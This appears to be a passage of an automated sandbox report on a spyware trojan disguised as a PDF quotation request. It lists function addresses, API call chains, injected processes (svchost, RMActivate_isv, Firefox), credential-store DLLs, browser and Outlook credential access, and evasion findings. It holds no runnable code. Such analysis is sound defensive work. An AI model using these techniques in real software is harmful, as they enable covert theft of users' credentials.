                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035BEEDB11_2_035BEEDB
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03512E9011_2_03512E90
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035BCE9311_2_035BCE93
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0359CD1F11_2_0359CD1F
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0350AD0011_2_0350AD00
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_034FADE011_2_034FADE0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03518DBF11_2_03518DBF
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03500C0011_2_03500C00
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_034F0CF211_2_034F0CF2
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035A0CB511_2_035A0CB5
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_034ED34C11_2_034ED34C
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035B132D11_2_035B132D
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0354739A11_2_0354739A
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0351B2C011_2_0351B2C0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035A12ED11_2_035A12ED
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035052A011_2_035052A0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035CB16B11_2_035CB16B
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_034EF17211_2_034EF172
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0353516C11_2_0353516C
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0350B1B011_2_0350B1B0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035070C011_2_035070C0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035AF0CC11_2_035AF0CC
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035B70E911_2_035B70E9
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035BF0E011_2_035BF0E0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035BF7B011_2_035BF7B0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035B16CC11_2_035B16CC
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035B757111_2_035B7571
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0359D5B011_2_0359D5B0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_034F146011_2_034F1460
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035BF43F11_2_035BF43F
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035BFB7611_2_035BFB76
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03575BF011_2_03575BF0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0353DBF911_2_0353DBF9
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0351FB8011_2_0351FB80
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035BFA4911_2_035BFA49
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035B7A4611_2_035B7A46
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03573A6C11_2_03573A6C
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035ADAC611_2_035ADAC6
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03545AA011_2_03545AA0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0359DAAC11_2_0359DAAC
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035A1AA311_2_035A1AA3
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0350995011_2_03509950
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0351B95011_2_0351B950
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0359591011_2_03595910
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0356D80011_2_0356D800
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035038E011_2_035038E0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035BFF0911_2_035BFF09
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03501F9211_2_03501F92
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035BFFB111_2_035BFFB1
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03509EB011_2_03509EB0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035B1D5A11_2_035B1D5A
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03503D4011_2_03503D40
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035B7D7311_2_035B7D73
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_0351FDC011_2_0351FDC0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_03579C3211_2_03579C32
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_035BFCF211_2_035BFCF2
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E11B6011_2_02E11B60
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E0CAB011_2_02E0CAB0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E0CCD011_2_02E0CCD0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E0AD5011_2_02E0AD50
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E133C011_2_02E133C0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E133BD11_2_02E133BD
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E151C011_2_02E151C0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E2B80011_2_02E2B800
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033EE2EC11_2_033EE2EC
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033E019E11_2_033E019E
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033EE7CC11_2_033EE7CC
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033EE59B11_2_033EE59B
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033EE43311_2_033EE433
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033ECB3811_2_033ECB38
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033ED86311_2_033ED863
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033ED89811_2_033ED898
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 102 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 277 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 86 times
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: String function: 004115D7 appears 36 times
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: String function: 00416C70 appears 39 times
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: String function: 00445AE0 appears 65 times
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: String function: 0356EA12 appears 86 times
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: String function: 03535130 appears 58 times
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: String function: 0357F290 appears 105 times
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: String function: 03547E54 appears 102 times
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: String function: 034EB970 appears 277 times
                Source: Quotation request -30112024_pdf.exe, 00000002.00000003.1298695264.00000000045BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation request -30112024_pdf.exe
                Source: Quotation request -30112024_pdf.exe, 00000002.00000003.1296967343.00000000043C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation request -30112024_pdf.exe
                Source: Quotation request -30112024_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@15/8
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0044AF6C GetLastError,FormatMessageW,2_2_0044AF6C
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,2_2_004333BE
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,2_2_00464EAE
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,2_2_0045D619
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,2_2_004755C4
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,2_2_0047839D
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,2_2_0043305F
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeFile created: C:\Users\user~1\AppData\Local\Temp\aut77F7.tmpJump to behavior
                Source: Quotation request -30112024_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000003084000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3131128904.000000000305F000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000003056000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000003031000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000003.1892153485.0000000003056000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Quotation request -30112024_pdf.exeReversingLabs: Detection: 63%
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeFile read: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe"
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe"
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeProcess created: C:\Windows\SysWOW64\RMActivate_isv.exe "C:\Windows\SysWOW64\RMActivate_isv.exe"
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quotation request -30112024_pdf.exe"Jump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeProcess created: C:\Windows\SysWOW64\RMActivate_isv.exe "C:\Windows\SysWOW64\RMActivate_isv.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xvYhLzczmazJ.exe, 0000000A.00000000.1561536330.00000000000EE000.00000002.00000001.01000000.00000005.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1722910301.00000000000EE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Quotation request -30112024_pdf.exe, 00000002.00000003.1298534176.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, Quotation request -30112024_pdf.exe, 00000002.00000003.1299779489.0000000004490000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1641673492.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1546649019.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1641673492.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1544927146.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000003.1641739098.0000000003165000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3134894660.000000000365E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3134894660.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000003.1644453148.000000000331A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Quotation request -30112024_pdf.exe, 00000002.00000003.1298534176.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, Quotation request -30112024_pdf.exe, 00000002.00000003.1299779489.0000000004490000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000002.1641673492.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1546649019.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1641673492.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1544927146.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, RMActivate_isv.exe, 0000000B.00000003.1641739098.0000000003165000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3134894660.000000000365E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3134894660.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000003.1644453148.000000000331A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: rmactivate_isv.pdb source: svchost.exe, 00000007.00000003.1605760726.0000000003B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1605855367.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000003.1576053827.000000000420D000.00000004.00000001.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000003.1576936987.00000000042AA000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: rmactivate_isv.pdbGCTL source: svchost.exe, 00000007.00000003.1605760726.0000000003B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1605855367.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000003.1576053827.000000000420D000.00000004.00000001.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000A.00000003.1576936987.00000000042AA000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FD3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3135956729.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1723645888.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2000496930.00000000288EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FD3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3135956729.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000000.1723645888.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2000496930.00000000288EC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0040EBD0 LoadLibraryA,GetProcAddress,2_2_0040EBD0
                Source: Quotation request -30112024_pdf.exeStatic PE information: real checksum: 0xa961f should be: 0xefb8d
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00416CB5 push ecx; ret 2_2_00416CC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00414129 push ebx; iretd 7_2_00414136
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00422192 push ss; ret 7_2_0042219A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041EEFA push ebx; iretd 7_2_0041EF05
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00411766 push ebp; retf 7_2_00411767
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402FB0 push eax; ret 7_2_00402FB2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C0225F pushad ; ret 7_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C027FA pushad ; ret 7_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C309AD push ecx; mov dword ptr [esp], ecx7_2_03C309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C0283D push eax; iretd 7_2_03C02858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C01368 push eax; iretd 7_2_03C01369
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C01065 push edi; ret 7_2_03C0108A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C018F3 push edx; iretd 7_2_03C01906
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_034F09AD push ecx; mov dword ptr [esp], ecx11_2_034F09B6
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E0E7B3 push ebp; retf 11_2_02E0E7B4
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_02E1BF47 push ebx; iretd 11_2_02E1BF52
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033EC327 pushad ; ret 11_2_033EC328
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeCode function: 11_2_033E046A push ds; ret 11_2_033E0475
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_0047A330
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00434418
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeAPI/Special instruction interceptor: Address: 326329C
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeFile opened / queried: C:\Program Files (x86)\VMware Workstation\Fuxm8.exeJump to behavior
